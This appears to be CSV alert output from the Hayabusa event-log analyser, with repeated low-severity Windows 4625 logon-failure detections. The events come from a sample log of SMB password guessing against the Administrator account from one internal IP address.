+2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
